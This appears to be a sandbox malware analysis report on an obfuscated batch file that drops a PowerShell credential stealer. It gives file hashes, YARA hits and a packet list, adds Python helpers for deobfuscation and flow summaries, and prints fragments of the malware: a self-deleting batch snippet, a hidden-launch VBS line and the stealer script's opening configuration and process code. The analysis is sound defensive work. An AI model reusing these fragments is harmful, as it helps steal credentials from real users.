                                        SHA1:2936E7B0EC05CE73AA5DA91D1964AB595DDEF026
                                        SHA-256:9A48691FF04CC5CD5919F111CBAE45B2C5B63FDA296C908F253CE9133B4B61A9
                                        SHA-512:503C316A1E19BD9482B2722B8972548D983259B3835891326BBFAC44E65F0E3FDD487905A5DF70D71E26FB5369C29554873C0CBA550FEF9923FB4F9AE3E089A1
                                        Malicious:false
                                        Preview:bing.com (1).c.bing.com (3).c1.microsoft.com (3).google.com (2).login.microsoftonline.com (2).microsoft.com (6).support.microsoft.com (7).support.office.com (1)..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:y:y
                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                        Malicious:false
                                        Preview:..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2
                                        Entropy (8bit):1.0
                                        Encrypted:false
                                        SSDEEP:3:y:y
                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                        Malicious:false
                                        Preview:..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                        Category:dropped
                                        Size (bytes):31608
                                        Entropy (8bit):4.2599081563185095
                                        Encrypted:false
                                        SSDEEP:768:2ccTvVX/B1XKM8NZvAhig5g3hjhr1thghohQhShvhFhphhhghbhHhQhzhFhxh0h4:7SvVX/B1XKM8NZvAhig5g3hjhr1thghC
                                        MD5:6DE1B3CB908E146D10CD4CC58FC976E4
                                        SHA1:64A3C69D3830420764654C61084F9EA55506ED01
                                        SHA-256:9967FD5EB033A11FC88A3304C1B88C7BA792C563C70E9844A8C45DF0610BE699
                                        SHA-512:E2B71293A918AC5D49CF4F96A016D7D84CF82D6A09FC3E042AAA2741A6FBF7C63E4479E23E029D12D5149FAA68F9117433CDBCC7427C77266428E70C3C361292
                                        Malicious:false
                                        Preview:....................................................................................................................................... ............... .... ...... ............ ...... .... ... ......................... ...... ... ............... ....... ................. ...................................... ... ...........................
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):3.2135160449350533
                                        Encrypted:false
                                        SSDEEP:3:QRirkYhl8GnMG1olNlP9:QRTY4hXN9
                                        MD5:96E51190B70C10705DE824B2389733E1
                                        SHA1:260B2EC0893E7072E9AD9C6CE5755339BFA41769
                                        SHA-256:23D7CED40FB7D942C6A280A795FF42D02C7A5D5554EB3E417699419A7B067D37
                                        SHA-512:AD847349BDBEEFC480C923D217B2BBA62900C0983BCF08D5AE5AC3BED091113B1676A9D352CE2AAC3D88AA9E6ED730EFEFF86FC42F64A2373221ED9946E7C126
                                        Malicious:false
                                        Preview:..9.7.W.T.N.-.W.Y.7.D.4.-.G.8.V.3.T.-.C.H.K.P.W.-.2.G.Y.P.4.....
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):460481
                                        Entropy (8bit):7.914690366125357
                                        Encrypted:false
                                        SSDEEP:12288:2U9Yh2N1hYOM1/9cV2fh2e1oDB+JwTZ+z:2fh2tvGlv2f4JwTZU
                                        MD5:F4FAD593F5625BCB8B1B7B0F422F9F6E
                                        SHA1:12A472D3C5F030B6E7112576FFC34A87BE4165B5
                                        SHA-256:418D38C1AA554755277D5DA39078395F2BB98877C82A5C1C6AFC1132770921D5
                                        SHA-512:1B68B0C3A9CFF24B76EECCB1F75D5F3C9830072E53C69A5CCFC07D6568DD566825EE1DDEF0B3AEF9FE4E5A65148ADDB7A675FC850065426266A63A9EFD6F63EF
                                        Malicious:false
                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw.*...J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u..*.O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):32768
                                        Entropy (8bit):0.017262956703125623
                                        Encrypted:false
                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                        Malicious:false
                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):163
                                        Entropy (8bit):4.705739866447997
                                        Encrypted:false
                                        SSDEEP:3:mKDDgvJxwuMWt+WfWVMX4kTFSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9wvmxgvt2hQI1iAMLg34jAxg9EZ
                                        MD5:299524AF64C33561C3F80743CA46217E
                                        SHA1:B32A426DA4C57961BAC1B712D758B53F2DC52061
                                        SHA-256:BCD7FB2443B70AD9F3E1B1A3E2989DAF870DEC8DBD35E239C9AAB10CDDE2DD44
                                        SHA-512:0E6B5989E0B73EB217F05D4D65BF61AB23016CACD2E14CC80613AD9865AB22391F29730FB8BE0168C2D43C82EAEB157AD3F93CB1887830377C5DC00C8172B0A0
                                        Malicious:false
                                        Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with very long lines (4083), with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):75913
                                        Entropy (8bit):5.3213810718350105
                                        Encrypted:false
                                        SSDEEP:1536:oSDVn5ahg5yYp6zdv/5l05Qo8l01zhwZPhZcLcJS7srHX6Cd:oSDVn5Uwiv/5IQo8l01zhw5hUc9KCd
                                        MD5:A8631654ACF90D83ADC4681D485BF3E5
                                        SHA1:90E48EB01E19EA218362C1F882F776B363D05D6A
                                        SHA-256:5687E23CA7E442EA12D71626F29F7822D3D4F1B105F839B173FA015E533B6736
                                        SHA-512:14758A43B65D5DAECE3F1781BAAFFCB19F00A40A0195D90ADE006F92A0C6A7A480DED0AC4CE890C24C878E14DC72FC93CDCFF3B85792CB1E5EFAC7C625619354
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\Desktop\kematian.ps1, Author: Joe Security
                                        • Rule: JoeSecurity_PowerShellScreenShot, Description: Yara detected PowerShell ScreenShot, Source: C:\Users\user\Desktop\kematian.ps1, Author: Joe Security
                                        Preview:#$webhook = "YOUR_URL_HERE_SERVER" ..#$debug = $false..#$blockhostsfile = $false..#$criticalprocess = $false..#$melt = $false..#$fakeerror = $false..#$persistence = $false..#$write_disk_only = $false..#$vm_protect = $false..#$encryption_key = "YOUR_ENC_KEY_HERE"..[Net.ServicePointManager]::SecurityProtocol = "Tls, Tls11, Tls12, Ssl3"....if ($debug) {.. $ProgressPreference = 'Continue'..}..else {.. $ErrorActionPreference = 'SilentlyContinue'.. $ProgressPreference = 'SilentlyContinue'..}....# Load WPF assemblies..Add-Type -AssemblyName PresentationCore, PresentationFramework, System.Net.Http, System.Windows.Forms, System.Drawing....# Critical Process..function CriticalProcess {.. param ([Parameter(Mandatory = $true)][string]$MethodName, [Parameter(Mandatory = $true)][uint32]$IsCritical, [uint32]$Unknown1, [uint32]$Unknown2).. [System.Diagnostics.Process]::EnterDebugMode() .. $domain = [AppDomain]::CurrentDomain.. $name = New-Object System.Reflection.AssemblyName('Dyn
                                        Process:C:\Windows\System32\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):84
                                        Entropy (8bit):4.762163220315799
                                        Encrypted:false
                                        SSDEEP:3:FER/1GXfeFH5Ot+WfWVMX4kfFvJFxAAov:FERtbFHIwvm9QAy
                                        MD5:E65308175E5D291D6731D37792EA8545
                                        SHA1:D92A69B072259E8CE61700E66A961DAB71BD211F
                                        SHA-256:CB822654C794AE9E336D73BE81D3BE5382BE09E139FDC35AAE69A6C3C5F33208
                                        SHA-512:5554E6107D8641402EC292845A8AD2B883E7412AA8C7D76B8067BE99EF3AB5B1F26FC87BB884259198F27BAACCF7E75A650C83F165A14664584DCD75CFACD2ED
                                        Malicious:true
                                        Preview:CreateObject("Wscript.Shell").Run "C:\Users\user\Desktop\pirates.bat", 0, True ..
                                        Process:C:\Windows\System32\find.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):74
                                        Entropy (8bit):4.619352056366697
                                        Encrypted:false
                                        SSDEEP:3:ohAILCpIt+WfWVMX4kTHqn:ohOIwvmxKn
                                        MD5:DEBB460B2CE4BFF06C21EF014048B6D4
                                        SHA1:76E08CB0F4C4A89AEF2A026EA5253A1913D098D5
                                        SHA-256:B19036B9FC4DE141F9F4717423034203AA995BBE1408CE7FD2BF0DFAE7CD45DB
                                        SHA-512:F896199139CA59A724CDF7817D62BFAC60429349F090A43DEBEA2BB9F1159875BEE184ED077132542B9AF2931DFE4C4AB6AF0BBC9824CFD96862CFE703AD00A1
                                        Malicious:false
                                        Preview:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " ..
                                        File type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                        Entropy (8bit):2.4495964738309257
                                        TrID:
                                        • MP3 audio (ID3 v1.x tag) (2501/1) 45.44%
                                        • Text - UTF-16 (LE) encoded (2002/1) 36.37%
                                        • MP3 audio (1001/1) 18.19%
                                        File name:pirates.bat
                                        File size:3'787'378 bytes
                                        MD5:cbcb58dabe241328f335d5710a7d5564
                                        SHA1:ca88012046bb818c24980b8d9c6fef0310dcd662
                                        SHA256:c87215ddba4bbda4ff1c9cf6a8d95012e42d3cecfeb1c22e65f7880e4102388b
                                        SHA512:6db0d757ea68705692262f9d9ad76d277dcbf407d63ae9215c425c7d3d620d240f4f26fe73fb22911a11f0a73de6e7de291b2058116bf59be097fee7d1246109
                                        SSDEEP:6144:eU0L7ReDkuXpOraQftcvIaJfFM9Cl5BpE0m6a9HKT6oJlwApWYcp/Z:I74Dkk+t8tpy9G09HHon8ZZ
                                        TLSH:5906BF21861CCE3A6395226904E91E0E2AC4CBC043761FDFFD6859C6677EF0726693DE
                                        File Content Preview:..%mpKriOjiN%>%GGkkkal%%yPikIOxCQ%n%ZMItFTB%%ELWoeLa%u%TmgOfBC%%rOAlToqBJ%l%BnIiEsSfL% %QpOlZgy%2%pGMUkpB%%GMvdcYp%>%UYIhfAMc%%LKgwjGiLo%&%ccCeCZf%%AqbTJFm%1%JHtIWNQ% %FrpswPR%&%JbZbtQH%%ZXFLaCUky%&%biJECTy% %SocAiiJOG%e%ojUbBtj%%zRqvcqbSO%x%qBRAHRL%%YdAg
                                        Icon Hash:9686878b929a9886
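The "File Content Preview" above shows how the sample is obfuscated: the characters of each command are separated by references such as %mpKriOjiN% to environment variables that are never defined. Inside a batch file cmd.exe expands an undefined %NAME% to an empty string, so the padding disappears at run time while static string matching on the file fails. The following is an added example, not code from the report or from the sample, that reproduces this expansion to recover the plain commands. It assumes the script does not depend on the caller's real environment (pass a dict of real variables as env if it does) and it ignores delayed !var! expansion and %~ modifiers. Run on the constructed preview fragment it yields `>nul 2>&1 && ex`, the beginning of a command that the report's preview cuts off.

```python
"""Strip %UNDEFINED_VAR% padding from an obfuscated batch file.

Added example, not part of the Joe Sandbox report. cmd.exe expands %NAME%
to the variable's value inside a batch file and to nothing when NAME is not
defined; removing those references recovers the command line.
"""
import re

# Constructed sample: the start of the report's "File Content Preview",
# cut where the report truncates it (after "x%qBRAHRL%").
PREVIEW = ("%mpKriOjiN%>%GGkkkal%%yPikIOxCQ%n%ZMItFTB%%ELWoeLa%u%TmgOfBC%"
           "%rOAlToqBJ%l%BnIiEsSfL% %QpOlZgy%2%pGMUkpB%%GMvdcYp%>%UYIhfAMc%"
           "%LKgwjGiLo%&%ccCeCZf%%AqbTJFm%1%JHtIWNQ% %FrpswPR%&%JbZbtQH%"
           "%ZXFLaCUky%&%biJECTy% %SocAiiJOG%e%ojUbBtj%%zRqvcqbSO%x%qBRAHRL%")

# Plain 'set NAME=value' / 'set "NAME=value"' assignments; /a and /p are not handled.
_SET_RE = re.compile(r'^\s*set\s+"?([^=\s"]+)=(.*?)"?\s*$', re.IGNORECASE)


def expand_line(line, env):
    """Expand %VAR% the way cmd.exe does while running a batch file."""
    out, i, n = [], 0, len(line)
    while i < n:
        c = line[i]
        if c != '%':
            out.append(c)
            i += 1
            continue
        if i + 1 < n and line[i + 1] == '%':      # '%%' is a literal percent sign
            out.append('%')
            i += 2
            continue
        if i + 1 < n and line[i + 1] in '0123456789*':  # %0-%9, %*: no arguments given (assumption)
            i += 2
            continue
        j = line.find('%', i + 1)
        if j == -1:                               # a lone '%' in a batch file is dropped
            i += 1
            continue
        name = line[i + 1:j]
        out.append(env.get(name.upper(), ''))     # variable names are case-insensitive; undefined -> ''
        i = j + 1
    return ''.join(out)


def deobfuscate(text, env=None):
    """Expand every line, learning variables from 'set' statements as cmd would."""
    env = {k.upper(): v for k, v in (env or {}).items()}
    result = []
    for raw in text.splitlines():
        line = expand_line(raw, env)
        m = _SET_RE.match(line)
        if m:
            env[m.group(1).upper()] = m.group(2)
        result.append(line)
    return result


def deobfuscate_file(path, env=None):
    """Decode a UTF-16 (BOM) or single-byte batch file and deobfuscate it."""
    with open(path, 'rb') as fh:
        data = fh.read()
    if data[:2] in (b'\xff\xfe', b'\xfe\xff'):
        text = data.decode('utf-16')      # honours the BOM, as this sample uses
    else:
        text = data.decode('latin-1')
    return deobfuscate(text, env)


if __name__ == '__main__':
    for line in deobfuscate(PREVIEW):
        print(line)
```

Running the script prints the recovered fragment; deobfuscate_file handles the whole UTF-16 sample, and anything still wrapped in % after expansion points at a variable the script really defines, which the set-tracking above then resolves.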
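The packet list that follows records one row per packet between the analysis VM (192.168.2.4) and the hosts the sample contacted, on ports 443 and 80. Several hundred rows are hard to read as a packet-by-packet list, so an analyst normally collapses them into flows keyed by the VM's ephemeral port and the remote endpoint. The following is an added example, not part of the report: it parses rows in the report's column order (timestamp, source port, destination port, source IP, destination IP, separated by spaces or "|"), groups them into flows and reports packet counts per direction, duration and the set of remote endpoints. The sample rows are copied from the list below; the VM address is taken from the report.

```python
"""Collapse a sandbox packet list into per-flow statistics.

Added example, not part of the Joe Sandbox report. Rows are expected as
'<timestamp> <zone> <src port> <dst port> <src ip> <dst ip>'.
"""
import re
from datetime import datetime, timedelta

LOCAL_HOST = "192.168.2.4"   # the analysis VM's address as printed in the report

# Constructed sample: a few rows from the report's packet list.
SAMPLE_ROWS = """\
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 5, 2024 06:26:06.531177998 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:06.531224966 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.412744045 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:30.945823908 CEST | 63771 | 80 | 192.168.2.4 | 208.95.112.1
Jul 5, 2024 06:26:30.950701952 CEST | 80 | 63771 | 208.95.112.1 | 192.168.2.4
Jul 5, 2024 06:26:37.849798918 CEST | 63775 | 443 | 192.168.2.4 | 140.82.121.3
Jul 5, 2024 06:26:38.527287960 CEST | 443 | 63775 | 140.82.121.3 | 192.168.2.4
"""

ROW_RE = re.compile(
    r"^(?P<date>\w{3} \d{1,2}, \d{4}) (?P<time>\d\d:\d\d:\d\d\.\d+) \w+"
    r"[\s|]+(?P<sport>\d+)[\s|]+(?P<dport>\d+)[\s|]+(?P<sip>[\d.]+)[\s|]+(?P<dip>[\d.]+)\s*$")


def parse_row(row):
    """Return (timestamp, src_port, dst_port, src_ip, dst_ip), or None for a header/blank row."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    h, mi, s = m["time"].split(":")
    # The report prints nanosecond fractions; datetime only carries microseconds,
    # so build the timestamp from the date plus a float offset.
    ts = datetime.strptime(m["date"], "%b %d, %Y") + timedelta(
        hours=int(h), minutes=int(mi), seconds=float(s))
    return ts, int(m["sport"]), int(m["dport"]), m["sip"], m["dip"]


def summarize(text, local_host=LOCAL_HOST):
    """Group packets into flows keyed by (local port, remote ip, remote port)."""
    flows = {}
    for row in text.splitlines():
        rec = parse_row(row)
        if rec is None:
            continue
        ts, sport, dport, sip, dip = rec
        if sip == local_host:
            key, outbound = (sport, dip, dport), True
        elif dip == local_host:
            key, outbound = (dport, sip, sport), False
        else:
            continue   # neither side is the VM: not attributable to the sample
        f = flows.setdefault(key, {"packets": 0, "sent": 0, "received": 0,
                                   "first": ts, "last": ts})
        f["packets"] += 1
        f["sent" if outbound else "received"] += 1
        f["first"] = min(f["first"], ts)
        f["last"] = max(f["last"], ts)
    for f in flows.values():
        f["duration"] = (f["last"] - f["first"]).total_seconds()
    return flows


def remote_endpoints(flows):
    """Distinct (ip, port) pairs the VM talked to, sorted for IOC listing."""
    return sorted({(ip, port) for (_, ip, port) in flows})


def print_report(flows):
    print(f"{'local port':>10}  {'remote':<22} {'pkts':>5} {'out':>4} {'in':>4} {'secs':>8}")
    for (lport, ip, rport), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        print(f"{lport:>10}  {ip + ':' + str(rport):<22} {f['packets']:>5} "
              f"{f['sent']:>4} {f['received']:>4} {f['duration']:>8.3f}")


if __name__ == "__main__":
    flows = summarize(SAMPLE_ROWS)
    print_report(flows)
    print("remote endpoints:", remote_endpoints(flows))
```

Paste the full packet list in place of SAMPLE_ROWS to get one line per connection; the remote endpoint set is what goes into a blocklist, and a flow whose outbound count vastly exceeds its inbound count is the candidate exfiltration upload.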
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 5, 2024 06:26:06.531177998 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:06.531224966 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:06.531295061 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:06.542431116 CEST | 49730 | 443 | 192.168.2.4 | 185.199.110.133
Jul 5, 2024 06:26:06.542447090 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
Jul 5, 2024 06:26:07.041973114 CEST | 443 | 49730 | 185.199.110.133 | 192.168.2.4
